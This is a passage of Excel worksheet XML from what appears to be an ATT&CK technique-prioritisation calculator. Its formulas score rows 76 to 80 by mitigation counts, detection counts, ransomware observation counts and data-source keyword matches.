        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.41818181818181815</v>
      </c>
      <c r="Z76">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>9</v>
      </c>
      <c r="AA76">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.09</v>
      </c>
      <c r="AB76">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.09</v>
      </c>
      <c r="AC76" s="29" t="s">
        <v>389</v>
      </c>
      <c r="AD76" s="25" t="str" cm="1">
        <f t="array" ref="AD76">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC76)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE76" s="25">
        <f>IF(AD76="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF76" s="25" t="str" cm="1">
        <f t="array" ref="AF76">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC76)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG76" s="25">
        <f>IF(AF76="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH76" s="25" t="str" cm="1">
        <f t="array" ref="AH76">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC76)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI76" s="25">
        <f>IF(AH76="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ76" s="25" t="str" cm="1">
        <f t="array" ref="AJ76">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC76)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AK76" s="25">
        <f>IF(AJ76="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AL76" s="25" t="str" cm="1">
        <f t="array" ref="AL76">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC76)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM76" s="25">
        <f>IF(AL76="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN76" s="60">
        <v>2</v>
      </c>
      <c r="AO76" s="51">
        <v>1</v>
      </c>
      <c r="AP76" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.19144284594171429</v>
      </c>
      <c r="AQ76" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.41592059758349209</v>
      </c>
      <c r="AR76" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.41592059758349209</v>
      </c>
      <c r="AS76" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT76" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU7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77" spans="1:47" ht="32.1">
      <c r="A77" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11667441415666667</v>
      </c>
      <c r="B77" s="25">
        <f>SUM(H77,M77,V77)*(1+SUM(AE77,AG77,AI77,AK77,AM77))</f>
        <v>0.5000774749000001</v>
      </c>
      <c r="C77" s="25" t="s">
        <v>390</v>
      </c>
      <c r="D77" s="25" t="s">
        <v>391</v>
      </c>
      <c r="E77" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F77" s="51">
        <v>1</v>
      </c>
      <c r="G77" s="51">
        <v>1</v>
      </c>
      <c r="H77" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I77">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J77">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K77">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L77">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M77" s="44">
        <v>4.5695299999999996E-3</v>
      </c>
      <c r="N77" s="51">
        <v>0</v>
      </c>
      <c r="O77" s="51">
        <v>3</v>
      </c>
      <c r="P77" s="51">
        <v>2</v>
      </c>
      <c r="Q77" s="51">
        <v>0</v>
      </c>
      <c r="R77" s="52" t="s">
        <v>392</v>
      </c>
      <c r="S77" s="51">
        <v>13</v>
      </c>
      <c r="T77" s="51" t="s">
        <v>393</v>
      </c>
      <c r="U77" s="51">
        <v>13</v>
      </c>
      <c r="V77" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.27142857142857146</v>
      </c>
      <c r="W77">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>26</v>
      </c>
      <c r="X77">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.47272727272727272</v>
      </c>
      <c r="Y77">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.47272727272727272</v>
      </c>
      <c r="Z77">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA77">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB77">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC77" s="29" t="s">
        <v>394</v>
      </c>
      <c r="AD77" s="25" t="str" cm="1">
        <f t="array" ref="AD77">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC77)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE77" s="25">
        <f>IF(AD77="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF77" s="25" t="str" cm="1">
        <f t="array" ref="AF77">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC77)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG77" s="25">
        <f>IF(AF77="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH77" s="25" t="str" cm="1">
        <f t="array" ref="AH77">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC77)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI77" s="25">
        <f>IF(AH77="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ77" s="25" t="str" cm="1">
        <f t="array" ref="AJ77">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC77)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK77" s="25">
        <f>IF(AJ77="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL77" s="25" t="str" cm="1">
        <f t="array" ref="AL77">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC77)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM77" s="25">
        <f>IF(AL77="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN77" s="60">
        <v>2</v>
      </c>
      <c r="AO77" s="51">
        <v>1</v>
      </c>
      <c r="AP77" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.11667441415666667</v>
      </c>
      <c r="AQ77" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.16669249163333336</v>
      </c>
      <c r="AR77" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.16669249163333336</v>
      </c>
      <c r="AS77" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT77" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU7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78" spans="1:47">
      <c r="A78" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.28990133955000003</v>
      </c>
      <c r="B78" s="25">
        <f>SUM(H78,M78,V78)*(1+SUM(AE78,AG78,AI78,AK78,AM78))</f>
        <v>0.89901339550000015</v>
      </c>
      <c r="C78" s="25" t="s">
        <v>395</v>
      </c>
      <c r="D78" s="25" t="s">
        <v>396</v>
      </c>
      <c r="E78" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F78" s="51">
        <v>4</v>
      </c>
      <c r="G78" s="51">
        <v>4</v>
      </c>
      <c r="H78" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="I78">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.4</v>
      </c>
      <c r="J78">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="K78">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.4</v>
      </c>
      <c r="L78">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="M78" s="44">
        <v>4.5213500000000004E-3</v>
      </c>
      <c r="N78" s="51">
        <v>0</v>
      </c>
      <c r="O78" s="51">
        <v>3</v>
      </c>
      <c r="P78" s="51">
        <v>8</v>
      </c>
      <c r="Q78" s="51">
        <v>2</v>
      </c>
      <c r="R78" s="52" t="s">
        <v>397</v>
      </c>
      <c r="S78" s="51">
        <v>8</v>
      </c>
      <c r="T78" s="51" t="s">
        <v>398</v>
      </c>
      <c r="U78" s="51">
        <v>14</v>
      </c>
      <c r="V78" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.27142857142857146</v>
      </c>
      <c r="W78">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>22</v>
      </c>
      <c r="X78">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.4</v>
      </c>
      <c r="Y78">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.4</v>
      </c>
      <c r="Z78">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>13</v>
      </c>
      <c r="AA78">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.13</v>
      </c>
      <c r="AB78">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.13</v>
      </c>
      <c r="AC78" s="29" t="s">
        <v>399</v>
      </c>
      <c r="AD78" s="25" t="str" cm="1">
        <f t="array" ref="AD78">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC78)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE78" s="25">
        <f>IF(AD78="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF78" s="25" t="str" cm="1">
        <f t="array" ref="AF78">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC78)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG78" s="25">
        <f>IF(AF78="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH78" s="25" t="str" cm="1">
        <f t="array" ref="AH78">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC78)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI78" s="25">
        <f>IF(AH78="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ78" s="25" t="str" cm="1">
        <f t="array" ref="AJ78">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC78)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK78" s="25">
        <f>IF(AJ78="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL78" s="25" t="str" cm="1">
        <f t="array" ref="AL78">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC78)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM78" s="25">
        <f>IF(AL78="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN78" s="60">
        <v>6</v>
      </c>
      <c r="AO78" s="51">
        <v>1</v>
      </c>
      <c r="AP78" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.28990133955000003</v>
      </c>
      <c r="AQ78" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.29967113183333338</v>
      </c>
      <c r="AR78" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.29967113183333338</v>
      </c>
      <c r="AS78" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AT78" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AU7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79" spans="1:47">
      <c r="A79" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4867880283333335E-2</v>
      </c>
      <c r="B79" s="25">
        <f>SUM(H79,M79,V79)*(1+SUM(AE79,AG79,AI79,AK79,AM79))</f>
        <v>0.44867880283333339</v>
      </c>
      <c r="C79" s="25" t="s">
        <v>400</v>
      </c>
      <c r="D79" s="25" t="s">
        <v>401</v>
      </c>
      <c r="E79" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F79" s="51">
        <v>1</v>
      </c>
      <c r="G79" s="51">
        <v>1</v>
      </c>
      <c r="H79" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I79">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J79">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K79">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L79">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M79" s="44">
        <v>4.01915E-3</v>
      </c>
      <c r="N79" s="51">
        <v>0</v>
      </c>
      <c r="O79" s="51">
        <v>1</v>
      </c>
      <c r="P79" s="51">
        <v>4</v>
      </c>
      <c r="Q79" s="51">
        <v>0</v>
      </c>
      <c r="R79" s="52" t="s">
        <v>402</v>
      </c>
      <c r="S79" s="51">
        <v>14</v>
      </c>
      <c r="T79" s="51" t="s">
        <v>403</v>
      </c>
      <c r="U79" s="51">
        <v>8</v>
      </c>
      <c r="V79" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.23333333333333336</v>
      </c>
      <c r="W79">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>22</v>
      </c>
      <c r="X79">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.4</v>
      </c>
      <c r="Y79">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.4</v>
      </c>
      <c r="Z79">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>5</v>
      </c>
      <c r="AA79">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.05</v>
      </c>
      <c r="AB79">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.05</v>
      </c>
      <c r="AC79" s="29" t="s">
        <v>404</v>
      </c>
      <c r="AD79" s="25" t="str" cm="1">
        <f t="array" ref="AD79">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC79)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE79" s="25">
        <f>IF(AD79="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF79" s="25" t="str" cm="1">
        <f t="array" ref="AF79">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC79)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG79" s="25">
        <f>IF(AF79="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH79" s="25" t="str" cm="1">
        <f t="array" ref="AH79">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC79)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI79" s="25">
        <f>IF(AH79="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ79" s="25" t="str" cm="1">
        <f t="array" ref="AJ79">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC79)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK79" s="25">
        <f>IF(AJ79="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL79" s="25" t="str" cm="1">
        <f t="array" ref="AL79">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC79)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM79" s="25">
        <f>IF(AL79="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN79" s="52">
        <v>0</v>
      </c>
      <c r="AO79" s="51">
        <v>0</v>
      </c>
      <c r="AP79" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>4.4867880283333335E-2</v>
      </c>
      <c r="AQ79" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.14955960094444445</v>
      </c>
      <c r="AR79" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.14955960094444445</v>
      </c>
      <c r="AS79" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT79" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU7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80" spans="1:47">
      <c r="A80" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.6421494169999999E-2</v>
      </c>
      <c r="B80" s="25">
        <f>SUM(H80,M80,V80)*(1+SUM(AE80,AG80,AI80,AK80,AM80))</f>
        <v>0.36421494170000002</v>
      </c>
      <c r="C80" s="25" t="s">
        <v>405</v>
      </c>
      <c r="D80" s="25" t="s">
        <v>406</v>
      </c>
      <c r="E80" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F80" s="51">
        <v>1</v>
      </c>
      <c r="G80" s="51">
        <v>1</v>
      </c>
      <c r="H80" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I80">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J80">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K80">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L80">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M80" s="44">
        <v>4.01915E-3</v>
      </c>
      <c r="N80" s="51">
        <v>0</v>
      </c>
      <c r="O80" s="51">
        <v>0</v>
      </c>
      <c r="P80" s="51">
        <v>0</v>
      </c>
      <c r="Q80" s="51">
        <v>0</v>
      </c>
      <c r="R80" s="52" t="s">
        <v>407</v>
      </c>
      <c r="S80" s="51">
        <v>7</v>
      </c>
      <c r="T80" s="51" t="s">
        <v>408</v>
      </c>
      <c r="U80" s="51">
        <v>14</v>
      </c>
      <c r="V80" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.2</v>
      </c>
      <c r="W80">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>21</v>
      </c>
      <c r="X80">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Y80">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Z80">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA80">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB80">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC80" s="29" t="s">
        <v>97</v>
      </c>
      <c r="AD80" s="25" t="str" cm="1">
        <f t="array" ref="AD80">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC80)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE80" s="25">
        <f>IF(AD80="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF80" s="25" t="str" cm="1">
        <f t="array" ref="AF80">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC80)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG80" s="25">
        <f>IF(AF80="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH80" s="25" t="str" cm="1">
        <f t="array" ref="AH80">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC80)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI80" s="25">
        <f>IF(AH80="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ80" s="25" t="str" cm="1">
